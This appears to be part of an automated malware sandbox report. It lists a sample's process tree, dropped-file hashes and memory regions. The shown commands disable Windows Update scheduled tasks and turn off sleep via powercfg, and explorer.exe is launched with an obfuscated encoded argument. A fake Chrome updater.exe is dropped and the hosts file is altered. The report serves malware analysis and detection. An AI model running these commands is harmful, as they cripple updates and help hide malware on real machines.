C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
memory/436-69-0x0000000000000000-mapping.dmp
-
memory/472-96-0x0000000000000000-mapping.dmp
-
memory/472-128-0x0000000000000000-mapping.dmp
-
memory/524-70-0x0000000000000000-mapping.dmp
-
memory/576-141-0x0000000000000000-mapping.dmp
-
memory/576-84-0x0000000000000000-mapping.dmp
-
memory/584-97-0x0000000000000000-mapping.dmp
-
memory/584-129-0x0000000000000000-mapping.dmp
-
memory/628-89-0x0000000000000000-mapping.dmp
-
memory/636-79-0x0000000000000000-mapping.dmp
-
memory/676-144-0x0000000000000000-mapping.dmp
-
memory/696-145-0x0000000000000000-mapping.dmp
-
memory/700-147-0x0000000000000000-mapping.dmp
-
memory/852-80-0x0000000000000000-mapping.dmp
-
memory/868-103-0x0000000000000000-mapping.dmp
-
memory/880-150-0x0000000000060000-0x0000000000067000-memory.dmpFilesize
28KB
-
memory/880-153-0x0000000000280000-0x0000000000286000-memory.dmpFilesize
24KB
-
memory/880-152-0x0000000000060000-0x0000000000067000-memory.dmpFilesize
28KB
-
memory/916-93-0x0000000000000000-mapping.dmp
-
memory/948-112-0x0000000000000000-mapping.dmp
-
memory/968-102-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/968-100-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/968-133-0x0000000000000000-mapping.dmp
-
memory/968-95-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/968-104-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/968-101-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/968-91-0x0000000000000000-mapping.dmp
-
memory/1020-88-0x0000000000000000-mapping.dmp
-
memory/1048-74-0x0000000000000000-mapping.dmp
-
memory/1104-146-0x0000000000000000-mapping.dmp
-
memory/1108-99-0x0000000001310000-0x0000000001F76000-memory.dmpFilesize
12.4MB
-
memory/1108-177-0x0000000001310000-0x0000000001F76000-memory.dmpFilesize
12.4MB
-
memory/1172-132-0x0000000000000000-mapping.dmp
-
memory/1260-83-0x0000000000000000-mapping.dmp
-
memory/1260-115-0x0000000000000000-mapping.dmp
-
memory/1276-76-0x0000000000000000-mapping.dmp
-
memory/1320-160-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-168-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-176-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-158-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-124-0x0000000000000000-mapping.dmp
-
memory/1320-155-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-166-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-174-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-179-0x0000000000270000-0x0000000000290000-memory.dmpFilesize
128KB
-
memory/1320-172-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-171-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-178-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-170-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-156-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-162-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-164-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-180-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1320-165-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1324-142-0x0000000000000000-mapping.dmp
-
memory/1400-138-0x0000000000000000-mapping.dmp
-
memory/1440-140-0x0000000000000000-mapping.dmp
-
memory/1440-82-0x0000000000000000-mapping.dmp
-
memory/1456-134-0x0000000000000000-mapping.dmp
-
memory/1488-107-0x0000000000000000-mapping.dmp
-
memory/1488-78-0x0000000000000000-mapping.dmp
-
memory/1544-98-0x0000000000000000-mapping.dmp
-
memory/1544-71-0x0000000000000000-mapping.dmp
-
memory/1544-131-0x0000000000000000-mapping.dmp
-
memory/1552-121-0x0000000000000000-mapping.dmp
-
memory/1560-87-0x0000000000000000-mapping.dmp
-
memory/1560-122-0x0000000000000000-mapping.dmp
-
memory/1568-130-0x0000000000000000-mapping.dmp
-
memory/1576-73-0x0000000000000000-mapping.dmp
-
memory/1648-120-0x0000000000000000-mapping.dmp
-
memory/1652-64-0x000007FEED280000-0x000007FEEDCA3000-memory.dmpFilesize
10.1MB
-
memory/1652-67-0x0000000002634000-0x0000000002637000-memory.dmpFilesize
12KB
-
memory/1652-66-0x0000000002634000-0x0000000002637000-memory.dmpFilesize
12KB
-
memory/1652-68-0x000000000263B000-0x000000000265A000-memory.dmpFilesize
124KB
-
memory/1652-137-0x0000000000000000-mapping.dmp
-
memory/1652-62-0x0000000000000000-mapping.dmp
-
memory/1652-65-0x000007FEEC720000-0x000007FEED27D000-memory.dmpFilesize
11.4MB
-
memory/1668-139-0x0000000000000000-mapping.dmp
-
memory/1672-81-0x0000000000000000-mapping.dmp
-
memory/1676-57-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1676-54-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1676-55-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1676-56-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/1676-58-0x00000000773F0000-0x0000000077599000-memory.dmpFilesize
1.7MB
-
memory/1688-59-0x00000000000B0000-0x00000000004CE000-memory.dmpFilesize
4.1MB
-
memory/1688-61-0x000007FEFBC71000-0x000007FEFBC73000-memory.dmpFilesize
8KB
-
memory/1688-60-0x000000001B940000-0x000000001BD5E000-memory.dmpFilesize
4.1MB
-
memory/1692-135-0x0000000000000000-mapping.dmp
-
memory/1704-126-0x0000000000000000-mapping.dmp
-
memory/1720-119-0x0000000000000000-mapping.dmp
-
memory/1732-123-0x0000000000000000-mapping.dmp
-
memory/1736-75-0x0000000000000000-mapping.dmp
-
memory/1744-94-0x0000000000000000-mapping.dmp
-
memory/1752-136-0x0000000000000000-mapping.dmp
-
memory/1752-77-0x0000000000000000-mapping.dmp
-
memory/1768-125-0x0000000000000000-mapping.dmp
-
memory/1784-127-0x0000000000000000-mapping.dmp
-
memory/1804-72-0x0000000000000000-mapping.dmp
-
memory/1836-148-0x0000000000000000-mapping.dmp
-
memory/1920-86-0x0000000000000000-mapping.dmp
-
memory/1944-108-0x0000000000000000-mapping.dmp
-
memory/1944-111-0x000007FEEC270000-0x000007FEECDCD000-memory.dmpFilesize
11.4MB
-
memory/1944-113-0x0000000001264000-0x0000000001267000-memory.dmpFilesize
12KB
-
memory/1944-114-0x000000000126B000-0x000000000128A000-memory.dmpFilesize
124KB
-
memory/1944-117-0x0000000001264000-0x0000000001267000-memory.dmpFilesize
12KB
-
memory/1944-118-0x000000000126B000-0x000000000128A000-memory.dmpFilesize
124KB
-
memory/1980-116-0x0000000000000000-mapping.dmp
-
memory/1980-85-0x0000000000000000-mapping.dmp
-
memory/2012-149-0x00000000008C0000-0x00000000008C6000-memory.dmpFilesize
24KB
-
memory/2036-105-0x0000000000000000-mapping.dmp